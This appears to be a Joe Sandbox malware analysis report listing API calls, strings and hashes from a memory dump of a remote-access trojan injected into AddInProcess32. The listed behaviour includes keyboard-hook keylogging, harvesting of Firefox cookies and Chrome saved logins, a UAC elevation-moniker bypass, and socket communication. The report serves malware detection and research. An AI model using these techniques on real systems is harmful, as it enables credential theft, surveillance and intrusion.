                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$1$2$3$4$5$6$7$VG
                                                      • API String ID: 0-1861860590
                                                      • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                      • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                                      • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                                      • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 0040755C
                                                      • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Object_wcslen
                                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                      • API String ID: 240030777-3166923314
                                                      • Opcode ID: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                      • Instruction ID: 28daeeabb8f9d0779e909056d36d27ae9c6096be3406941992b1a3e854751cf1
                                                      • Opcode Fuzzy Hash: ee0c587a1dfa56a4776c25ed63fc93c62e7d4b1650b4331978f6b80fa64f11fb
                                                      • Instruction Fuzzy Hash: 88113771D04214B6D710EA959845BDEB77C9B08714F15006FF904B2281EB7CAE448A6F
                                                      APIs
                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                                      • GetLastError.KERNEL32 ref: 0041A84C
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                      • String ID:
                                                      • API String ID: 3587775597-0
                                                      • Opcode ID: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                      • Instruction ID: 52116c85fb856a5ac6c14b0259405ec20ae2fa8d9cc538ef9907a440d1633313
                                                      • Opcode Fuzzy Hash: b4f2e3a96ffad31793e55c3957a9d7d505f7fea0f7d1b1d8364ea5c68624dc3d
                                                      • Instruction Fuzzy Hash: 17817071104301ABC304EF61D885DAFB7A8FF94749F50082EF185521A2EF78EE49CB9A
                                                      APIs
                                                        • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                        • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                        • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                      • String ID: JD$JD$JD
                                                      • API String ID: 745075371-3517165026
                                                      • Opcode ID: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                      • Instruction ID: 3c84011e7dbdf7a6f9673bc5a23f9f2f22d5020eb6794df094384b3d0215d6fb
                                                      • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                                      • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                                      • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                                      • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseFile$FirstNext
                                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                      • API String ID: 1164774033-405221262
                                                      • Opcode ID: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                      • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                                      • Opcode Fuzzy Hash: 4169ffd3f28e2297937e5de7748edea37615030425ded00ed2c5c169ca4bc7f2
                                                      • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                                        • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                      • String ID:
                                                      • API String ID: 2341273852-0
                                                      • Opcode ID: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                      • Instruction ID: 53b23dfad01ba0d5beec27b7c27070a1caf437d6ccbc5233b8522822963bc02e
                                                      • Opcode Fuzzy Hash: 62a2abd498f26ce669d7ffff052401bb4e8331d26592ec8f44b35c1b9ec2a307
                                                      • Instruction Fuzzy Hash: 4A31807284431CAADB24E761DC89EEB736CAF09305F0405FBF559D2051EB3DDAC98A58
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                                        • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Find$CreateFirstNext
                                                      • String ID: 8SG$PXG$PXG$NG$PG
                                                      • API String ID: 341183262-3812160132
                                                      • Opcode ID: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                      • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                                      • Opcode Fuzzy Hash: cd9425940f8db8ef2b08a2b33307d693326731427aae5be40ce922e7e20f00f0
                                                      • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                      • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                      • GetLastError.KERNEL32 ref: 0040A328
                                                        • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                      • TranslateMessage.USER32(?), ref: 0040A385
                                                      • DispatchMessageA.USER32(?), ref: 0040A390
                                                      Strings
                                                      • Keylogger initialization failure: error , xrefs: 0040A33C
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                      • String ID: Keylogger initialization failure: error
                                                      • API String ID: 3219506041-952744263
                                                      • Opcode ID: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                      • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                      • Opcode Fuzzy Hash: d8c8387710f3476d83fdaf4ec3d7d354e2c1b68a13aa6285ca24eae745b098e4
                                                      • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 0040A451
                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                      • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                      • GetKeyState.USER32(00000010), ref: 0040A46E
                                                      • GetKeyboardState.USER32(?), ref: 0040A479
                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                      • String ID:
                                                      • API String ID: 1888522110-0
                                                      • Opcode ID: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                      • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                                      • Opcode Fuzzy Hash: 6b13a39d4d7102bd722f9bbc25ae7d3563ebcd6996124b6635e543b06ec7d5c4
                                                      • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                                      • API String ID: 2127411465-314212984
                                                      • Opcode ID: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                      • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                      • Opcode Fuzzy Hash: 79fdb5d939c4fda9ab65d5331e207ccd9125177c2b07759bb8af03fe36f6d8de
                                                      • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                      APIs
                                                      • _free.LIBCMT ref: 00449292
                                                      • _free.LIBCMT ref: 004492B6
                                                      • _free.LIBCMT ref: 0044943D
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                      • _free.LIBCMT ref: 00449609
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                      • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                      • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                      • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                      APIs
                                                        • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                        • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                        • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                        • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                        • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                      • String ID: !D@$PowrProf.dll$SetSuspendState
                                                      • API String ID: 1589313981-2876530381
                                                      • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                      • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                      • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                                      • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                      APIs
                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                      • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                      • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                      Strings
                                                      • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                      • String ID: http://geoplugin.net/json.gp
                                                      • API String ID: 3121278467-91888290
                                                      • Opcode ID: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                      • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                      • Opcode Fuzzy Hash: b01590e2803785cbe291e15456c0bc7acaef33a62877e88be574051367ac5976
                                                      • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                      APIs
                                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                      • GetLastError.KERNEL32 ref: 0040BA93
                                                      Strings
                                                      • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                      • UserProfile, xrefs: 0040BA59
                                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteErrorFileLast
                                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                      • API String ID: 2018770650-1062637481
                                                      • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                      • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                      • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                                      • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                      • GetLastError.KERNEL32 ref: 004179D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                      • String ID: SeShutdownPrivilege
                                                      • API String ID: 3534403312-3733053543
                                                      • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                      • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                      • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                      • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00409293
                                                        • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                      • FindClose.KERNEL32(00000000), ref: 004093FC
                                                        • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                        • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                                        • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                                                      • FindClose.KERNEL32(00000000), ref: 004095F4
                                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                      • String ID:
                                                      • API String ID: 1824512719-0
                                                      • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                      • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                      • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                                      • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FSE$FSE$PkGNG
                                                      • API String ID: 0-1266307253
                                                      • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                      • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                                      • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                                      • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                                      • String ID:
                                                      • API String ID: 276877138-0
                                                      • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                      • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                      • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                      • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                      APIs
                                                        • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                                        • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                                        • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                                      • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                      • ExitProcess.KERNEL32 ref: 0040F905
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                      • String ID: 5.1.3 Pro$override$pth_unenc
                                                      • API String ID: 2281282204-1392497409
                                                      • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                      • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                      • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                                      • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                      • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_22_2_400000_AddInProcess32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                      • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                      • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                      • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                      APIs
                                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                                      • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                      • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
